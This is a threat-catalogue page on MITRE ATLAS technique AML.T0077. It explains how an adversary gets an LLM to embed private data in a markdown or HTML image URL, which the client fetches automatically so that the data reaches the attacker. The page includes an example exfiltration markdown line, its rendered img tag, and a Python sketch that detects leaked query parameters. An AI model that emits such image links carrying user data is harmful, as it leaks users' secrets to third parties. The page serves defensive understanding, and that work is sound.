Technique · Exfiltration · ATLAS

AML.T0077 LLM Response Rendering

What it is

An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary-controlled server.

The adversary gets the LLM to present an image to the user, which the user's client application renders with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown.

For example, an LLM may produce the following markdown:

```
![ATLAS](https://atlas.mitre.org/image.png?secrets="private data")
```

The client renders it as an image tag, percent-encoding the quotes and the space in the URL:

```
<img src="https://atlas.mitre.org/image.png?secrets=%22private%20data%22" alt="ATLAS">
```

When the adversary's server hosting the requested image receives the request, the adversary obtains the contents of the `secrets` query parameter.
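
To make the leak concrete, the following is a minimal Python sketch of what the receiving server would learn from an auto-loaded image URL. It is an illustration under stated assumptions, not part of the ATLAS entry: the function name `leaked_parameters` and both regular expressions are hypothetical, the patterns cover only inline markdown images and double-quoted `src` attributes, and the sample URL percent-encodes its value because the simplified pattern does not handle spaces.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical, simplified patterns (assumptions for illustration only).
# Markdown images of the form ![alt](url); ignores titles, angle-bracket
# destinations, and reference-style images.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")
# The src attribute of an HTML <img> tag (double-quoted values only).
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc="([^"]+)"', re.IGNORECASE)


def leaked_parameters(response_text):
    """Return {image_url: {param: [values]}} for each image URL in
    response_text that carries query parameters.

    A client that renders these images would send the same parameters
    to the image host without any user interaction.
    """
    leaks = {}
    urls = MD_IMAGE.findall(response_text) + HTML_IMG.findall(response_text)
    for url in urls:
        params = parse_qs(urlsplit(url).query)
        if params:
            leaks[url] = params
    return leaks


response = (
    "Here you go: "
    "![ATLAS](https://atlas.mitre.org/image.png?secrets=private%20data)"
)
print(leaked_parameters(response))
# {'https://atlas.mitre.org/image.png?secrets=private%20data': {'secrets': ['private data']}}
```

The same check could run on model output before it reaches the renderer, for instance to flag image URLs whose host is not on an allowlist. That use is a design suggestion, not something the source prescribes.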

References

  1. https://atlas.mitre.org/techniques/AML.T0077

Related by meaning · 6

Nearest entities by semantic similarity across the cs-graph corpus.

ATLAS · LLM Prompt Obfuscation
ATLAS · LLM Trusted Output Components Manipulation
ATLAS · LLM Data Leakage
ATLAS · LLM Prompt Crafting
ATLAS · Exfiltration via AI Agent Tool Invocation
ATLAS · LLM Prompt Injection
Sourced from MITRE ATLAS — Adversarial Threat Landscape for AI Systems. Curated by Adam Lundqvist, SQUR.